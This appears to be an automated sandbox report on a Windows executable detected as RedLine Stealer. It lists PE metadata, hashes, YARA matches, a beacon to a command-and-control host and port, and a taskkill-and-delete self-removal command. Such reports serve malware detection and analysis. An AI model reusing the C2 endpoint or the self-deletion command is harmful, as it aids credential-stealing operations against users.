SHA1:	c722baba8294f20abdb344b61d72d444a4171b62
SHA256:	d3215483bba6219bb6587367aa3fa8c1737706497ed4befcb175649dc00e7be2
SHA512:	8c358748e913fdf227b58f6a46719fa7582295e30dcfe9b06fce624240d066f666d481d661ee42b106ff32e78877993d9680e921a9bc1fca4aa00269d2b09173
SSDEEP:	3072:FK1JZOpTvVQZ+rcIeRYs6YmszJqoD2X7BpGGoMTb3R35dINX9r59x4:kOpu0rjeRbVJqoDC1pGGoMTb3RDINN
TLSH:	34E35C2023A8871AD3EF4B7EF470451582F1E34B6222EB5E5E5476DE2F23B45A2117B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.9...............0..*..........~I... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42497e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC739A26A [Sun Dec 1 16:25:14 2075 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24930	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26000	0x5b6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x28000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x22984	0x22a00	e2334924fcae73e01133ddb947437d1d	False	0.4661693366425993	data	6.2842438593029515	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x26000	0x5b6	0x600	04da45285be9b54d0fdd93f4dd557df3	False	0.4173177083333333	data	4.088575048051407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x28000	0xc	0x200	8b1794b85696019f0735c78c6b115ba9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x260a0	0x32c	data			0.4187192118226601
RT_MANIFEST	0x263cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 30, 2024 01:28:56.895997047 CEST	49731	6677	192.168.2.4	147.185.221.16
Jun 30, 2024 01:28:56.900772095 CEST	6677	49731	147.185.221.16	192.168.2.4
Jun 30, 2024 01:28:56.900830984 CEST	49731	6677	192.168.2.4	147.185.221.16
Jun 30, 2024 01:28:56.907314062 CEST	49731	6677	192.168.2.4	147.185.221.16
Jun 30, 2024 01:28:56.912064075 CEST	6677	49731	147.185.221.16	192.168.2.4
Jun 30, 2024 01:28:57.281989098 CEST	49731	6677	192.168.2.4	147.185.221.16
Jun 30, 2024 01:28:57.286983967 CEST	6677	49731	147.185.221.16	192.168.2.4
Jun 30, 2024 01:29:18.266289949 CEST	6677	49731	147.185.221.16	192.168.2.4
Jun 30, 2024 01:29:18.266365051 CEST	49731	6677	192.168.2.4	147.185.221.16
Jun 30, 2024 01:29:18.272674084 CEST	49731	6677	192.168.2.4	147.185.221.16
Jun 30, 2024 01:29:18.277637959 CEST	6677	49731	147.185.221.16	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 30, 2024 01:28:56.881437063 CEST	61553	53	192.168.2.4	1.1.1.1
Jun 30, 2024 01:28:56.890644073 CEST	53	61553	1.1.1.1	192.168.2.4
Jun 30, 2024 01:29:29.366285086 CEST	53	55163	162.159.36.2	192.168.2.4
Jun 30, 2024 01:29:29.865099907 CEST	63494	53	192.168.2.4	1.1.1.1
Jun 30, 2024 01:29:29.872373104 CEST	53	63494	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 30, 2024 01:28:56.881437063 CEST	192.168.2.4	1.1.1.1	0xe9d6	Standard query (0)	medical-m.gl.at.ply.gg	A (IP address)	IN (0x0001)	false
Jun 30, 2024 01:29:29.865099907 CEST	192.168.2.4	1.1.1.1	0xb858	Standard query (0)	15.164.165.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 30, 2024 01:28:56.890644073 CEST	1.1.1.1	192.168.2.4	0xe9d6	No error (0)	medical-m.gl.at.ply.gg		147.185.221.16	A (IP address)	IN (0x0001)	false
Jun 30, 2024 01:29:29.872373104 CEST	1.1.1.1	192.168.2.4	0xb858	Name error (3)	15.164.165.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

medical-m.gl.at.ply.gg:6677

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	147.185.221.16	6677	6356	C:\Users\user\Desktop\Build.exe

Timestamp	Bytes transferred	Direction	Data
Jun 30, 2024 01:28:56.907314062 CEST	263	OUT	POST /IRemotePanel HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings" Host: medical-m.gl.at.ply.gg:6677 Content-Length: 136 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Build.exePID: 6356, Parent PID: 2580

General

Target ID:	0
Start time:	19:28:55
Start date:	29/06/2024
Path:	C:\Users\user\Desktop\Build.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Build.exe"
Imagebase:	0x320000
File size:	144'384 bytes
MD5 hash:	19E47B9ABF123F4502545A5FCB43C855
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_17ee6a17, Description: unknown, Source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4444, Parent PID: 6356

General

Target ID:	2
Start time:	19:29:17
Start date:	29/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3980, Parent PID: 4444

General

Target ID:	3
Start time:	19:29:17
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 4476, Parent PID: 4444

General

Target ID:	4
Start time:	19:29:17
Start date:	29/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /PID 6356
Imagebase:	0xfe0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: choice.exePID: 3096, Parent PID: 4444

General

Target ID:	5
Start time:	19:29:17
Start date:	29/06/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x840000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Build.exePID: 6356, Parent PID: 2580COMMON

Executed Functions

Function 04C689C0 Relevance: 3.3, Strings: 2, Instructions: 784COMMON

Download Yara Rule

Strings

S}m^, xrefs: 04C68F29, 04C68F2E
`_q, xrefs: 04C68F1D

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: S}m^$`_q
API String ID: 0-2935269216
Opcode ID: 3b53e6df2e6e1acec82196c173d93f24f4f6562f91439b1d5c6bd3b6dfb2d2ea
Instruction ID: 886e0981296d6e1fa6283bb2f72a8a2907b602ffb9293bdb0aec96bf26607f8d
Opcode Fuzzy Hash: 3b53e6df2e6e1acec82196c173d93f24f4f6562f91439b1d5c6bd3b6dfb2d2ea
Instruction Fuzzy Hash: C5527A70B002458FCB18EF79D59466EBBE7BF89300B248869D40ACB796DE34ED468B51

Function 00CCDFE8 Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bb88e36cc0ab165f0ef89c115691233a8caf9b5b31ea18f1bc5ee12fd9fb10
Instruction ID: 79d1cf0a887924888e1f84e06032bedf2082f6d71915d4a11505eacf85baee61
Opcode Fuzzy Hash: 92bb88e36cc0ab165f0ef89c115691233a8caf9b5b31ea18f1bc5ee12fd9fb10
Instruction Fuzzy Hash: E0621D34B002188FDB54DF64D998BADBBB2FF89300F1085A9E50AA7395DB749D85CF50

Function 04C64B50 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1afa3a10f392fd073c0064b216cbc9e2d58bb8f8708dea65edc62792b430f624
Instruction ID: 5ca708a1b073aa90ab3853417d254335f8a83ce5db382915adbf71ba608627bd
Opcode Fuzzy Hash: 1afa3a10f392fd073c0064b216cbc9e2d58bb8f8708dea65edc62792b430f624
Instruction Fuzzy Hash: 77C19D35700202AFEB18DF39DA84769B7A2EF80304F00C978D5169B6A5DB74F985CB99

Function 04C632D0 Relevance: 2.8, Strings: 2, Instructions: 297COMMON

Download Yara Rule

Strings

Hbq, xrefs: 04C63345
(bq, xrefs: 04C63528

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 80dd86bdc35c89a9fa32d005249f586b8a250273d14e1ccdfa2ca83f3363d894
Instruction ID: 0b9d0945d0fe9d83fd9455a3809d02f6e03faf2235dfe6add29518e35c8785df
Opcode Fuzzy Hash: 80dd86bdc35c89a9fa32d005249f586b8a250273d14e1ccdfa2ca83f3363d894
Instruction Fuzzy Hash: 80B1B134B002459FDB15DF68D494A6EBBF2FF89310F15846AE906AB3A1DB34ED05CB50

Function 00CC4DB0 Relevance: 2.7, Strings: 2, Instructions: 245COMMON

Download Yara Rule

Strings

(_^q, xrefs: 00CC4F61
(_^q, xrefs: 00CC4EE2

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID: (_^q$(_^q
API String ID: 0-3585068825
Opcode ID: fc713520fd8a19ec32c113db9d9c24122c8e9ba18793368d58a23d0e68a0ceed
Instruction ID: beacdf6b6281ad62d59cc1ae456c40fd2401e0eac9b659c0c82dbda147b2d5a7
Opcode Fuzzy Hash: fc713520fd8a19ec32c113db9d9c24122c8e9ba18793368d58a23d0e68a0ceed
Instruction Fuzzy Hash: 3091E075A042449FCB14AB78D414A6E7BB1FF86310F65C4AEE806DB382DB35ED46CB90

Function 00CC67B1 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00CC688E
4'^q, xrefs: 00CC68A0

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 6866299b968779e5a810e515dc80a3193b49cfc6bff1494061b4f76ddbf4cbad
Instruction ID: 1bdb00b5d88f98785b157467d3a834c8a07f454674c0884b747a3390bae45a99
Opcode Fuzzy Hash: 6866299b968779e5a810e515dc80a3193b49cfc6bff1494061b4f76ddbf4cbad
Instruction Fuzzy Hash: 3E41BE30B843548FCB29AB38D568A6D7BA2AF89300F15887DD502C7396DF35DC4A8B51

Function 04C6DA38 Relevance: 2.6, Strings: 2, Instructions: 136COMMON

Download Yara Rule

Strings

(bq, xrefs: 04C6DB59
Hbq, xrefs: 04C6DBAD

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: cddeb4324804b318d4729cc750aeb466ac8f4b8a62e8e29c11ac99f3d321cbe0
Instruction ID: d01139cea532dcc8396cf264f44cf0bc9082bcd640767a86863cabc1f95ce5c7
Opcode Fuzzy Hash: cddeb4324804b318d4729cc750aeb466ac8f4b8a62e8e29c11ac99f3d321cbe0
Instruction Fuzzy Hash: 5A51DC74F442688FDB14DFB8D458AADBBF2AF89300F24846ED402A7395CE35AD04CB64

Function 04C6DB4E Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

(bq, xrefs: 04C6DB59
Hbq, xrefs: 04C6DBAD

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: d0341bee18d8f01f4526579781378be6d01bc8874c392abef5f07f3ff29a8b4c
Instruction ID: 64f075205919c4315a2bd5e9c06485e2cef7164dcfebdaebbf8d6fc5b3d0fa80
Opcode Fuzzy Hash: d0341bee18d8f01f4526579781378be6d01bc8874c392abef5f07f3ff29a8b4c
Instruction Fuzzy Hash: CF21D134F412649FCB25AFB4E45851D7FF2BF9A300B21882EE406A7381CE349C05CB55

Function 00CC6888 Relevance: 2.5, Strings: 2, Instructions: 23COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00CC688E
4'^q, xrefs: 00CC68A0

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: fbc41a8c05b27a5ae6804bc534569e9bb0bcb78617cbf9b479ca97f226cf91b0
Instruction ID: 806b890486f1b944d09a948a482bb0778b0f3f148844917a5d0d6dcdd0b53d0d
Opcode Fuzzy Hash: fbc41a8c05b27a5ae6804bc534569e9bb0bcb78617cbf9b479ca97f226cf91b0
Instruction Fuzzy Hash: FAE092305897204FC318EB2EE64548ABBD6EE843003008D39D18A47729DF70A88D46A5

Function 00CC6E08 Relevance: 2.0, Instructions: 1984COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590d6b051c03a9146ad3dd70008573e6e14c830862a34533b3d39ee4494f34ac
Instruction ID: 38dd1537181dc5f72dbf3fbbf53835aedef57fa03a6360767a31b9e1d268de93
Opcode Fuzzy Hash: 590d6b051c03a9146ad3dd70008573e6e14c830862a34533b3d39ee4494f34ac
Instruction Fuzzy Hash: 6D234179902204DFCF666F60DA68659B732FB8A305B20C46FEE1223764CB7A9D51DF01

Function 00CC6E18 Relevance: 2.0, Instructions: 1978COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61efdf4df8851eca6abe762d3cf36cc768ea3f0df326afaf9ea87c9246eecb5
Instruction ID: 5aa6eb778819f3175a2023542de3e968e74d9a27dec81b20491da62f69d7ae4a
Opcode Fuzzy Hash: d61efdf4df8851eca6abe762d3cf36cc768ea3f0df326afaf9ea87c9246eecb5
Instruction Fuzzy Hash: E8233279902204DFCF66AF60D668659B732FB8A305B20C46FEE1223764CB7A9D51DF01

Function 04C65A20 Relevance: 1.5, Strings: 1, Instructions: 275COMMON

Download Yara Rule

Strings

XX^q, xrefs: 04C65D41

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: XX^q
API String ID: 0-1315485225
Opcode ID: a0d1743fa522cfcec78ca94e12632bec5e85cea07d129803be67e03d31b06907
Instruction ID: 0c7ddd1649d704f828b69b5d7bf61f612b8e7b86b7925ea8933715975e01a33d
Opcode Fuzzy Hash: a0d1743fa522cfcec78ca94e12632bec5e85cea07d129803be67e03d31b06907
Instruction Fuzzy Hash: A7A1CD31B00206AFDB24EB38E49476EB7A3EB81310F10C939D5569B795EB70EE498791

Function 04C698F8 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04C69933

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 948ba94328d7d8351ce5cb8ff24fe11ec4afa8bae6e59f161de749c7e74d056c
Instruction ID: 3aad5d9e40bce0ff9b03a384275148593d9b062a40b3b54e8cd68e2a268fb058
Opcode Fuzzy Hash: 948ba94328d7d8351ce5cb8ff24fe11ec4afa8bae6e59f161de749c7e74d056c
Instruction Fuzzy Hash: 0361BD357002058FCB25EF38E5A465E7BE2FF85310B108939E4068BB5ADB35ED0ACB91

Function 04C6E058 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04C6E2DB

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 207472edcad242c18420f20a9f01c708a5e36cee311b67786f4d312a2f73c770
Instruction ID: 5915d40947a29463d8532a047afa96e3bae7f44d989c6e690b92ce11a78fbbe7
Opcode Fuzzy Hash: 207472edcad242c18420f20a9f01c708a5e36cee311b67786f4d312a2f73c770
Instruction Fuzzy Hash: CF51C271A002499FDB04DF68D99469DBBB6FF89300F108A6AE806AB355DB70E944CB90

Function 00CC9268 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

$^q, xrefs: 00CC940B

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: c8065277d90f4856a984b5708326c282f6b8fed23235d9caa1b974dcab62a3e4
Instruction ID: 31158bf1b9df5f2adf6945620be334e1a83836927dc5e22716206d28c15c127c
Opcode Fuzzy Hash: c8065277d90f4856a984b5708326c282f6b8fed23235d9caa1b974dcab62a3e4
Instruction Fuzzy Hash: 9351A070B402145FDB08EB68D9A177FB6A7EBC9300F20892DD101AB394DF75AE0687D5

Function 00CC9278 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

$^q, xrefs: 00CC940B

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: cc2f26a913d832f21a15d23232a5f52a83a0b8b67aee55db6da0856e6fc3f14f
Instruction ID: 94442396be803b68efaec92c00ea1ba2ee09285e1aff069cd0a706d4adaf69a4
Opcode Fuzzy Hash: cc2f26a913d832f21a15d23232a5f52a83a0b8b67aee55db6da0856e6fc3f14f
Instruction Fuzzy Hash: 01519170B401145FDB08EBA8D9A177FB6A7EBC9300F60892DD1016B394DF76AE0687D5

Function 04C6BE70 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

kPm^, xrefs: 04C6BEAE

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: kPm^
API String ID: 0-81914048
Opcode ID: c536152e774156a6593117a8598b69bc3421c260f025882563fa6ffeefd9cd3b
Instruction ID: d9946d841efa6749ca57cda6fabe4259a438f90ee831509d58f3095ee1571a43
Opcode Fuzzy Hash: c536152e774156a6593117a8598b69bc3421c260f025882563fa6ffeefd9cd3b
Instruction Fuzzy Hash: 80517BB1E002199FCB10DFA9D88469EBBF6FF88310F10846AD519EB340DB74AA45CB95

Function 04C6D010 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04C6D1C3

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 6509a5d9b1ee4c46cd769fcb2fb701ec08e75e18afb69798eaeb005971d334e4
Instruction ID: 308acb9b2f67f04992735a9cb9fbb47347490d98ee1aba9baef09563651cf2c0
Opcode Fuzzy Hash: 6509a5d9b1ee4c46cd769fcb2fb701ec08e75e18afb69798eaeb005971d334e4
Instruction Fuzzy Hash: 33514F35A00218DFDB14DFA8D584BDDBBB2EF48315F14C529E806AB250DB75AA89CF90

Function 04C6F7E0 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

(_^q, xrefs: 04C6F918

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: f79eb9f529127a7b6c74fe6c22d0b575a775ba3818170176955ba0cec21abfa0
Instruction ID: 9ffccf09d9c9f471489358a103f2cea07d7fde5e2739f4893ac5c0c0692934f2
Opcode Fuzzy Hash: f79eb9f529127a7b6c74fe6c22d0b575a775ba3818170176955ba0cec21abfa0
Instruction Fuzzy Hash: 6D413779B002099FCB14DF68D454AAE7BF2BF8D310F248569E806A7355DB35ED01CBA1

Function 04C698E7 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04C69933

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

